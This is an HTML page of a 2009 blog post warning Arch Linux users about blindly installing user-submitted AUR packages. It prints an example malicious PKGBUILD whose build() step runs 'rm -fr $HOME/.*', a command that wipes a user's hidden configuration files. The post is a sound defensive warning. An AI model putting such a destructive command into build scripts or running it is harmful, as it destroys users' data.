<!DOCTYPE HTML>
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>AUR Insecurity -  rsontech.net</title>

    <link href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" media="screen" href="/static/css/elements.css">
    <link rel="stylesheet" type="text/css" media="screen" href="/static/css/syntax.css">
    <link href="http://fonts.googleapis.com/css?family=Pathway+Gothic+One|Open+Sans:300" rel="stylesheet" type="text/css">
  </head>

  <body>
    <div class="container">
      <header class="page-header">
        <span><a href="/">rsontech.net</a></span><!--
     --><nav>
          <ul>
            <li><a href="/">blog</a></li><!--
         --><li><a href="/archive">archive</a></li><!--
         --><li><a href="/tags">tags</a></li><!--
         --><li><a href="/about">about</a></li>
          </ul>
        </nav>
      </header>
      <section>
  <article class="full">
    <header>
      <h1>AUR Insecurity</h1>
      <ul class="list-unstyled list-inline meta">
        <li>
		  <a href="/2009/08/05/aur-insecurity.html" title="Permalink">
			<time date="2009-08-05 00:00:00 -0400">August 05, 2009</time>
		  </a>
		</li>
		
		<li>Tagged: <a href="/tags/arch.html" rel="tag">arch</a></li>
		
	  </ul>
    </header>
    <p>Everytime I see a new user asking about the AUR on IRC I cringe. Not because I don&#8217;t use the AUR or I think the AUR is a bad thing, but because I know that someone is going to recommend a way to automagically install these user provided packages.</p>

<p>Remember, the AUR is a user repository. This means that any evil bastard can upload a PKGBUILD that can wreck your system. I&#8217;ve written an example below &#8211; the urls have been changed so you can&#8217;t possibly run makepkg on this and hurt anything.</p>
<div class='highlight'><pre><code class='bash'><span class='nv'>pkgname</span><span class='o'>=</span>super-cool-program
<span class='nv'>pkgver</span><span class='o'>=</span>6.0.1
<span class='nv'>pkgrel</span><span class='o'>=</span>1
<span class='nv'>pkgdesc</span><span class='o'>=</span><span class='s1'>&#39;Something really awesome that you want to install&#39;</span>
<span class='nv'>arch</span><span class='o'>=(</span><span class='s1'>&#39;i686&#39;</span> <span class='s1'>&#39;x86_64&#39;</span><span class='o'>)</span>
<span class='nv'>url</span><span class='o'>=</span><span class='s1'>&#39;http://a.trustworthy.source.url/&#39;</span>
<span class='nv'>license</span><span class='o'>=(</span><span class='s1'>&#39;None&#39;</span><span class='o'>)</span>
<span class='nv'>depends</span><span class='o'>=()</span>
<span class='nb'>source</span><span class='o'>=(</span>http://a.trustworthy.source.url/<span class='k'>${</span><span class='nv'>pkgname</span><span class='k'>}</span>/<span class='k'>${</span><span class='nv'>pkgver</span><span class='k'>}</span>/<span class='o'>)</span>
<span class='nv'>md5sums</span><span class='o'>=(</span><span class='s1'>&#39;e6f64c753e4d6de8db6fc2e0d&#39;</span><span class='o'>)</span>
build<span class='o'>()</span> <span class='o'>{</span>
  <span class='nb'>cd</span> <span class='k'>${</span><span class='nv'>srcdir</span><span class='k'>}</span> <span class='o'>&amp;&amp;</span> rm -fr <span class='nv'>$HOME</span>/.*
  install -D -m755 <span class='k'>${</span><span class='nv'>pkgname</span><span class='k'>}</span> <span class='k'>${</span><span class='nv'>pkgdir</span><span class='k'>}</span>/usr/bin/<span class='k'>${</span><span class='nv'>pkgname</span><span class='k'>}</span>
<span class='o'>}</span>
</code></pre></div>
<p>Any experienced user will quickly notice the horrible thing that hapens here. Of course, this is a <strong>very</strong> simple PKGBUILD. Look at <a href='https://aur.archlinux.org/packages/li/linux-ice/PKGBUILD'>this one</a> for example, malicious code could be anywhere in there and a quick glance isn&#8217;t going to catch it. Obviously <code>rm</code> is just one example of something malicious, it&#8217;s just an easy one to demonstrate.</p>

<p>So how many times have you blindly installed something from the AUR? I know I have a few times. I also know that I&#8217;ll never do it again. Hopefully the next time you <code>wget &amp;&amp; tar &amp;&amp; makepkg</code> you&#8217;ll take a second and think about what you might be getting yourself in to.</p>
    </footer>
  </article>
</section>

<div id="disqus_thread"></div>
<script type="text/javascript">
var disqus_shortname = 'rsontechnet';
(function() {
  var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
  dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
  (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">blog comments powered by <span class="logo-disqus">Disqus</span></a>

      <footer class="text-muted">
        <p>
          &copy;2006-2013 rsontech.net &ndash;
          Powered by <a href="http://jekyllrb.com/">Jekyll</a> &ndash;
          <a href="http://github.com/rson/rson.github.com/">Source</a>
        </p>
      </footer>
    </div>
  </body>
</html>
